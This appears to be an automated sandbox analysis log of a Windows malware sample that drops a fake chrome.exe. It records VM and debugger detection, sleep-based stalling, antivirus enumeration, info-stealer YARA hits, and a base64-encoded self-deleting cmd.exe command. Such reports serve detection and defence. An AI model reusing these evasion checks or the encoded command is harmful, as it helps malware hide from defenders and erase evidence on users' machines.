Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\cmd.exe TID: 1033720 Thread sleep count: 3341 > 30
Source: C:\Windows\SysWOW64\cmd.exe TID: 1033720 Thread sleep time: -40092000s >= -30000s
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe TID: 1033976 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\chrome.exe TID: 1033756 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\chrome.exe TID: 118108 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3341
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Window / User API: threadDelayed 9412
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe API coverage: 3.7 %
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\softokn3.dll
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mozglue.dll
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss3.dll
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IconLib.dll
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\freebl3.dll
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msvcp140.dll
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: wtqsCpda..exe, 0000000F.00000002.80316092456.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Windows\vboxhook.dll
Source: chrome.exe, 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: vmware
Source: chrome.exe Binary or memory string: \vboxhook.dll
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684948349.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83501450597.0000000001151000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502605752.00000000011ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wtqsCpda..exe, 0000000F.00000000.79892756744.0000000000542000.00000002.00000001.01000000.00000007.sdmp, wtqsCpda..exe, 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.80097480691.0000000000762000.00000002.00000001.01000000.00000009.sdmp, chrome.exe, 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: \vboxhook.dllQY21kLmV4ZSAvYyBwaW5nIDAgLW4gMiAmIGRlbCA=
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD71A3 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect, 1_2_00BD71A3
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BDA22B FindFirstFileExW, 1_2_00BDA22B
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD7B8E mov eax, dword ptr fs:[00000030h] 1_2_00BD7B8E
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD9DF6 mov eax, dword ptr fs:[00000030h] 1_2_00BD9DF6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02E6001A mov eax, dword ptr fs:[00000030h] 12_2_02E6001A
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD4959 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00BD4959
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD71A3 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C 1_2_00BD71A3
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BDB2B8 GetProcessHeap, 1_2_00BDB2B8
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 18_2_02B9A698 LdrInitializeThunk, 18_2_02B9A698
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD4AEF SetUnhandledExceptionFilter, 1_2_00BD4AEF
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD72E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00BD72E0
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD42DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00BD42DA

HIPS / PFW / Operating System Protection Evasion

Source: Chrome[1].exe.1.dr, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: wtqsCpda..exe.1.dr, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: chrome.exe.15.dr, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 15.0.wtqsCpda..exe.540000.3.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 15.0.wtqsCpda..exe.540000.2.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 15.0.wtqsCpda..exe.540000.1.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 15.0.wtqsCpda..exe.540000.0.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 15.2.wtqsCpda..exe.540000.0.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: IconLib.dll.18.dr, System.Drawing.IconLib/Win32.cs Reference to suspicious API methods: ('FindResource', 'FindResource@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll'), ('LoadLibraryEx', 'LoadLibraryEx@kernel32.dll')
Source: 18.2.chrome.exe.760000.0.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 18.0.chrome.exe.760000.0.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 19.0.chrome.exe.a20000.0.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 19.2.chrome.exe.a20000.0.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 19.0.chrome.exe.a20000.1.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 19.0.chrome.exe.a20000.2.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 19.0.chrome.exe.a20000.3.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process created: C:\Users\user\AppData\Local\Temp\chrome.exe "C:\Users\user\AppData\Local\Temp\chrome.exe"
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: GetProgmanWindow
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager+
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager-
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager1
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager5
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: SetProgmanWindow
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Queries volume information: C:\Users\user\AppData\Roaming\wtqsCpda..exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Queries volume information: C:\Users\user\AppData\Local\Temp\chrome.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Queries volume information: C:\Users\user\AppData\Local\Temp\chrome.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD4775 cpuid 1_2_00BD4775
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD4BDE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_00BD4BDE

Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match File source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.80097480691.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.80087663971.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.83499752484.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80247515540.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.80088120152.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79892756744.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79892233843.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.80404784517.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80246486829.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79893250831.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.80311999722.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80246995488.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79893776213.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wtqsCpda..exe PID: 1033924, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: schtasks.exe PID: 1034124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chrome.exe PID: 1034204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chrome.exe PID: 6672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: chrome.exe, 00000012.00000003.80689278406.00000000069AF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.82973891926.00000000069AF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83520044548.00000000069B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: chrome.exe, 00000012.00000002.83507733263.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83505966850.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83511079923.0000000003178000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE
